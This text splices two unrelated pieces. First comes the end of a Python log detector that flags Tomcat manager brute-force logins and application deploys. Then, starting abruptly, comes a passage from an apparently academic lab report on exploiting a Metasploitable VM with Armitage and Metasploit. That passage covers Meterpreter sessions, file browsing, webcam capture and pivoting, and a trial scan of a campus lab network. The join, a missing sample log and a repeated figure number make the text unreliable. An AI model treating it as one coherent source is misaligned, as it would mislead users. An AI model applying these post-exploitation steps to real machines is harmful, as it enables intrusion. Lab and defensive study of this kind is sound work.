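    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Manager URLs that change the set of deployed applications (assumed paths).
# A 200 on one of these means code was added to or removed from the server.
DEPLOY_RE = re.compile(r'^/manager/(html/)?(deploy|undeploy)\b')


def parse(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text, fail_threshold=5):
    """Return (source_ip, reason) alerts for manager brute force and deploys."""
    failures = defaultdict(int)  # consecutive 401s on /manager per source IP
    alerts = []
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec or not rec["path"].startswith("/manager"):
            continue
        ip, status = rec["ip"], int(rec["status"])
        if status == 401:
            failures[ip] += 1
            if failures[ip] == fail_threshold:  # alert once per burst
                alerts.append((ip, "manager login brute force"))
        elif status == 200 and rec["user"] != "-" and failures[ip] >= fail_threshold:
            # A guessing run that ends in an authenticated page: credentials were found.
            alerts.append((ip, f"login succeeded after {failures[ip]} failures as {rec['user']}"))
            failures[ip] = 0
        if status == 200 and DEPLOY_RE.match(rec["path"]):
            alerts.append((ip, f"{rec['method']} {rec['path'].split('?')[0]} by {rec['user']}"))
    return alerts
```

Run over the sample, the detector reports the brute force, the successful tomcat log-in that ended it, and the deploy request; the unrelated authenticated manager visit from 192.168.56.20 produces nothing.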
Figure 4.33 – Set the username, password and port. Then click Launch
Once the exploit finishes running, it should complete successfully and then the
Metasploitable machine's icon that shows in the target section of Armitage will turn red and
lightning bolts will surround it. This will also allow a new drop down menu item to be seen
called Meterpreter, which is used in order to gain access to the machine. Figures 4.33 and 4.34
show this change in icon and new drop down option.
Figure 4.33 – Exploited Metasploitable machine.
Figure 4.34 – Meterpreter session opened, showing explore options.
Once the session has been opened, one can browse files on the remote machine, show the
processes, take a screenshot if applicable or even access a web cam on the machine to take a
picture. Clicking on Post Modules will show other payloads that can be delivered with the
current session. These will show up in the left-hand pane of Armitage under the module database
section. Figure 4.35 shows the list for this particular machine.
Other options include interacting through a shell and pivoting, which allows the
user to make this machine a pivot point of access in the network. With multiple machines on the
network this would allow the user to attempt to use the privileges currently obtained in
order to gain access to other machines.
Figure 4.35 – List of post modules for Metasploitable machine.
5. Conclusion
The Metasploit Framework is a useful tool in checking vulnerabilities on the network. It
works quite well with Armitage when used on Rapid7’s Metasploitable Virtual Machine.
However, a real world test was unsuccessful when Armitage and Metasploit were used on the
FGCU Computer Science Lab Network. The assumption is that there are no known
vulnerabilities on this network.
The virtualized test with Metasploitable and Armitage yielded success. This was a test that
was expected to work and was only used to show the capabilities of Metasploit used in unison
with Armitage. This successful test shows that the frameworks work together and that future
attempts may follow this project in order to enhance the functionality of exploits.
The ability to keep track of information that is found by the Metasploit Framework is not
available in the free version that was used in this project. However, a commercial version is
available that has an extensive database to store previously found exploits and vulnerabilities for
the tester to refer back to. An excellent addition to this project would be to use these tools in order
to further detect currently unseen and untested vulnerabilities. The commercial version can be
found on Rapid7’s Metasploit website. The activation is done through email and purchase can
be done online. [4]
6. References
[1] Metasploit, September 2011, URL: http://www.metasploit.com/
[2] Virtual Box, September 2011, URL: http://www.vitrualbox.org/
[3] Virtual Box Downloads, September 2011, URL: http://www.vitrualbox.org/wiki/Downloads/
[4] Metasploit Download, September 2011, URL: http://www.metasploit.com/download/
[5] D. Maynor and K.K. Mookhey, Metasploit Toolkit: For Penetration Testing, Exploit
Development, and Vulnerability Research, Syngress Publishing, Inc., Burlington, MA, 2007
[6] D. Kennedy, J. O’Gorman, D. Kearns, and M. Aharoni, Metasploit: The Penetration Tester's
Guide, No Starch Press, Inc., San Francisco, CA, 2011
[7] Metasploitable Image, September 2011, URL:
http://updates.metasploit.com/data/Metasploitable.zip.torrent
[8] Ultimate LAMP Image, September 2011, URL:
http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip
[9] Ubuntu 11.10 Image, September 2011, URL:
http://www.ubuntu.com/start-download?distro=desktop&bits=32&release=latest
[10] Armitage, November 2011, URL: http://www.fastandeasyhacking.com